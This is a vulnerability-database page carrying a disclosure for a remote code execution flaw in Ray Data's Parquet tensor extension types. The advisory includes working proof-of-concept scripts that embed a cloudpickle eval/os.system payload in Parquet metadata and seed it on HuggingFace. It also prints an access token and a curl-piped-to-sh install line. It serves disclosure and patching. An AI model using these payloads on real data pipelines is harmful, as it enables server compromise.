CVE-2026-41486

GHSA-mw35-8rx3-xf9r HIGH
Published April 24, 2026

# Remote Code Execution via Parquet Arrow Extension Type Deserialization ## Summary Ray Data registers custom Arrow extension types (`ray.data.arrow_tensor`, `ray.data.arrow_tensor_v2`, `ray.data.arrow_variable_shaped_tensor`) globally in PyArrow. When PyArrow reads a Parquet file containing one...

Full CISO analysis pending enrichment.

Affected Systems

Package Ecosystem Vulnerable Range Patched
ray pip >= 2.49.0, < 2.55.0 2.55.0
42.2K OpenSSF 6.2 868 dependents Pushed 5d ago 78% patched ~186d to patch Full package profile →

Do you use ray? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
N/A

Recommended Action

Patch available

Update ray to version 2.55.0

Compliance Impact

Compliance analysis pending. Sign in for full compliance mapping when available.

Frequently Asked Questions

What is CVE-2026-41486?

Ray: Remote Code Execution via Parquet Arrow Extension Type Deserialization

Is CVE-2026-41486 actively exploited?

No confirmed active exploitation of CVE-2026-41486 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-41486?

Update to patched version: ray 2.55.0.

What is the CVSS score for CVE-2026-41486?

No CVSS score has been assigned yet.

Technical Details

NVD Description

# Remote Code Execution via Parquet Arrow Extension Type Deserialization ## Summary Ray Data registers custom Arrow extension types (`ray.data.arrow_tensor`, `ray.data.arrow_tensor_v2`, `ray.data.arrow_variable_shaped_tensor`) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls `__arrow_ext_deserialize__` on the field's metadata bytes. Ray's implementation passes these bytes directly to `cloudpickle.loads()`, achieving arbitrary code execution during schema parsing, before any row data is read. In May 2024, Ray fixed a related vulnerability in `PyExtensionType`-based extension types ([issue #41314](https://github.com/ray-project/ray/issues/41314), [PR #45084](https://github.com/ray-project/ray/pull/45084)). In July 2025, [PR #54831](https://github.com/ray-project/ray/pull/54831) introduced `cloudpickle.loads()` into the replacement extension types' deserialization path, reintroducing the same class of vulnerability. Note: Source links in this report are pinned to the Ray 2.54.0 release commit (`48bd1f8fa4`) for stable line references. We also re-verified the same vulnerable code paths on current `master` as of March 17, 2026. ## Details ### Extension type registration Ray Data registers three Arrow extension types globally in PyArrow: ```python # python/ray/data/_internal/tensor_extensions/arrow.py:1603-1605 pa.register_extension_type(ArrowTensorType((0,), pa.int64())) pa.register_extension_type(ArrowTensorTypeV2((0,), pa.int64())) pa.register_extension_type(ArrowVariableShapedTensorType(pa.int64(), 0)) ``` Registration happens at module load time ([`__init__.py:94-95`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/__init__.py#L94-L95)), and any use of `ray.data` triggers it. Once registered, PyArrow automatically calls `__arrow_ext_deserialize__` whenever it encounters these extension type names in any Parquet file's schema, including files from untrusted sources. ### The code path to `cloudpickle.loads()` All three extension types inherit from `ArrowExtensionSerializeDeserializeCache`, whose `__arrow_ext_deserialize__` method ([`arrow.py:176-179`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L176-L179)) delegates to subclass methods that ultimately call `_deserialize_with_fallback()`: ```python # python/ray/data/_internal/tensor_extensions/arrow.py:84-96 def _deserialize_with_fallback(serialized: bytes, field_name: str = "data"): """Deserialize data with cloudpickle first, fallback to JSON.""" try: # Try cloudpickle first (new format) return cloudpickle.loads(serialized) # <-- arbitrary code execution except Exception: # Fallback to JSON format (legacy) try: return json.loads(serialized) except json.JSONDecodeError: raise ValueError( f"Unable to deserialize {field_name} from {type(serialized)}" ) ``` The `serialized` bytes come directly from the Parquet file's field-level metadata (`ARROW:extension:metadata`) with no validation. `cloudpickle.loads()` is tried **first**, meaning a crafted payload will always be executed before the safe JSON fallback is reached. For `ArrowTensorType`, the call chain is: ``` __arrow_ext_deserialize__(cls, storage_type, serialized) # arrow.py:176 -> _arrow_ext_deserialize_cache(serialized, value_type) # arrow.py:178 -> _arrow_ext_deserialize_compute(serialized, value_type) # arrow.py:652 -> _deserialize_with_fallback(serialized, "shape") # arrow.py:653 -> cloudpickle.loads(serialized) # arrow.py:88 RCE ``` `ArrowTensorTypeV2` ([`arrow.py:679-680`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L679-L680)) and `ArrowVariableShapedTensorType` ([`arrow.py:1076-1077`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L1076-L1077)) follow the same pattern. ### Why the existing mitigation doesn't help After issue [#41314](https://github.com/ray-project/ray/issues/41314), Ray added `check_for_legacy_tensor_type()` in [`parquet_datasource.py:146-170`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/datasource/parquet_datasource.py#L146-L170) to block the old `PyExtensionType`-based tensor types: ```python # python/ray/data/_internal/datasource/parquet_datasource.py:146-170 def check_for_legacy_tensor_type(schema): """Check for the legacy tensor extension type and raise an error if found. Ray Data uses an extension type to represent tensors in Arrow tables. Previously, the extension type extended `PyExtensionType`. However, this base type can expose users to arbitrary code execution. To prevent this, we don't load the type by default. """ for name, type in zip(schema.names, schema.types): if isinstance(type, pa.UnknownExtensionType) and isinstance( type, pa.PyExtensionType ): raise RuntimeError(...) ``` This guard checks for `PyExtensionType` / `UnknownExtensionType`. It does **not** check for the currently-registered `ray.data.arrow_tensor` types, which are the ones that call `cloudpickle.loads()`. Additionally, the check runs after PyArrow has already deserialized the schema, so even if it checked for the current types, the code execution would have already occurred. ### Outside Ray's documented threat model Ray's [security documentation](https://docs.ray.io/en/latest/ray-security/index.html) states that Ray relies on network isolation and "extensively uses cloudpickle." This vulnerability does not require cluster access. The payload arrives through a Parquet file from cloud storage, a data lake, HuggingFace, or a shared filesystem. A perfectly firewalled Ray cluster is vulnerable if it reads a crafted file. ## Impact - **Affected versions**: Ray 2.49.0 through 2.54.0 (latest release as of March 2026). The vulnerable `_deserialize_with_fallback` function with `cloudpickle.loads()` was introduced in commit `f6d21db1a4` ([PR #54831](https://github.com/ray-project/ray/pull/54831), July 2025), first released in Ray 2.49.0. - **Affected configurations**: Any process that uses Ray Data and reads Parquet files. The extension types are registered globally in PyArrow, so all Parquet reads in the process are affected, including `ray.data.read_parquet()`, `pyarrow.parquet.read_table()`, `pandas.read_parquet()`, etc. - **Attacker prerequisites**: The attacker must place a crafted Parquet file where a Ray Data pipeline reads it. No authentication or cluster access is required. The Parquet file must contain a column with a `ray.data.arrow_tensor` (or v2, or variable-shaped) extension type name, which makes this a targeted attack against Ray Data users. - **CIA impact**: Arbitrary command execution as the Ray worker process user, resulting in full server compromise. - **Severity**: Critical ### Attack scenarios 1. **HuggingFace datasets**: Ray's documentation [recommends](https://docs.ray.io/en/latest/data/loading-data.html#reading-files-from-hugging-face) reading Parquet datasets from HuggingFace using `ray.data.read_parquet("hf://datasets/...", filesystem=HfFileSystem())`. Anyone can create a HuggingFace dataset containing a crafted Parquet file. A tensor column with `ray.data.arrow_tensor` metadata is normal for an ML dataset, as tensor columns are a core Ray Data feature. We verified this scenario end-to-end with a private HuggingFace dataset (see PoC below). 2. **Multi-tenant ML platforms**: Organizations running shared Ray clusters where multiple teams submit data processing jobs. If one team can write Parquet files to shared storage that another team reads, the writer can execute arbitrary code in the reader's context. 3. **Compromised data pipelines**: An upstream data producer writes Parquet files with crafted tensor column metadata. The payload survives because standard Parquet tools preserve extension metadata transparently. ## PoC We provide two reproductions: a minimal local PoC and a full end-to-end scenario via HuggingFace. **Prerequisites:** Python 3.12+ and [uv](https://docs.astral.sh/uv/getting-started/installation/) (`curl -LsSf https://astral.sh/uv/install.sh | sh`). ### PoC 1: Local file Creates a valid Parquet file with a tensor column whose extension metadata contains a crafted cloudpickle payload. Reading the file with Ray Data triggers code execution during schema parsing. **1. Create the Parquet file:** ```bash cat > craft_parquet.py << 'SCRIPT' import cloudpickle import pyarrow as pa import pyarrow.parquet as pq COMMAND = "id > /tmp/ray-tensor-rce-proof" class Trigger: def __reduce__(self): return (eval, (f"(__import__('os').system({COMMAND!r}), (1,))[1]",)) storage_type = pa.list_(pa.int64()) schema = pa.schema([ pa.field("tensor", storage_type, metadata={ b"ARROW:extension:name": b"ray.data.arrow_tensor", b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()), }), pa.field("id", pa.int64()), pa.field("text", pa.string()), ]) table = pa.Table.from_arrays([ pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type), pa.array([1, 2]), pa.array(["hello", "world"]), ], schema=schema) pq.write_table(table, "crafted.parquet") print("Created crafted.parquet") SCRIPT uv run --with 'cloudpickle,pyarrow' python craft_parquet.py ``` **2. Read it with Ray Data:** ```bash rm -f /tmp/ray-tensor-rce-proof uv run --with 'ray[data]' python -c " import ray.data ray.data.read_parquet('crafted.parquet') " cat /tmp/ray-tensor-rce-proof # Expected: output of 'id' — confirms code execution ``` ### PoC 2: End-to-end via HuggingFace This demonstrates the realistic attack scenario: a crafted Parquet file hosted as a HuggingFace dataset, read by a Ray cluster following [Ray's own documentation](https://docs.ray.io/en/latest/data/loading-data.html#reading-files-from-hugging-face). We uploaded a crafted Parquet file to a private HuggingFace dataset at [`antiproof/parquet-tensor-disclosure`](https://huggingface.co/datasets/antiproof/parquet-tensor-disclosure). The file looks like a normal ML dataset with tensor, id, and text columns. The read-only token below gives access. **Upload script** (for reference, this is how we seeded the dataset): ```bash cat > upload_dataset.py << 'SCRIPT' # /// script # requires-python = ">=3.10" # dependencies = ["cloudpickle", "pyarrow", "huggingface_hub"] # /// """Upload a crafted Parquet file to a HuggingFace dataset. Prerequisites: huggingface-cli login (with a write token) Usage: uv run upload_dataset.py <repo_id> <command> """ import sys, tempfile from pathlib import Path import cloudpickle, pyarrow as pa, pyarrow.parquet as pq from huggingface_hub import HfApi def build_parquet(output, command): class Trigger: def __reduce__(self): return (eval, (f"(__import__('os').system({command!r}), (1,))[1]",)) storage_type = pa.list_(pa.int64()) schema = pa.schema([ pa.field("tensor", storage_type, metadata={ b"ARROW:extension:name": b"ray.data.arrow_tensor", b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()), }), pa.field("id", pa.int64()), pa.field("text", pa.string()), ]) table = pa.Table.from_arrays([ pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type), pa.array([1, 2]), pa.array(["hello", "world"]), ], schema=schema) pq.write_table(table, str(output)) repo_id, command = sys.argv[1], sys.argv[2] with tempfile.TemporaryDirectory() as tmpdir: parquet = Path(tmpdir) / "train.parquet" build_parquet(parquet, command) HfApi().upload_file( path_or_fileobj=str(parquet), path_in_repo="data/train.parquet", repo_id=repo_id, repo_type="dataset", ) print(f"Uploaded to https://huggingface.co/datasets/{repo_id}") SCRIPT # We ran: # uv run upload_dataset.py antiproof/parquet-tensor-disclosure 'id > /tmp/ray-tensor-rce-proof' ``` **Reproduce** (reads the dataset from HuggingFace, no local files needed): ```bash rm -f /tmp/ray-tensor-rce-proof HF_TOKEN=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 \ uv run --with 'ray[data],huggingface_hub' python -c " import ray.data from huggingface_hub import HfFileSystem ray.data.read_parquet( 'hf://datasets/antiproof/parquet-tensor-disclosure/data/train.parquet', filesystem=HfFileSystem(), ) " cat /tmp/ray-tensor-rce-proof # Expected: output of 'id' — confirms code execution via HuggingFace dataset ``` The token above is read-only. The dataset is private to prevent unintended exposure. ## Suggested fix The extension metadata stores simple values (a shape tuple like `(3, 224, 224)` or an ndim integer). These do not require cloudpickle. 1. **Replace `cloudpickle.loads()` in `_deserialize_with_fallback()` with `json.loads()`.** The tensor shape and ndim are JSON-serializable. For backward compatibility with files written using the current cloudpickle format, gate `cloudpickle.loads()` behind an opt-in environment variable (following the pattern already established with `RAY_DATA_AUTOLOAD_PYEXTENSIONTYPE`). 2. **Serialize new extension type metadata as JSON by default.** `json.dumps([3, 224, 224])` carries the same information as `cloudpickle.dumps((3, 224, 224))`, without the code execution risk. 3. **Add a security note to `read_parquet()` documentation** explaining that Parquet files from untrusted sources can execute arbitrary code when tensor extension types are registered. Please contact security@antiproof.ai with any questions about this disclosure policy or related security research.

Timeline

Published
April 24, 2026
Last Modified
April 24, 2026
First Seen
April 24, 2026

Related Vulnerabilities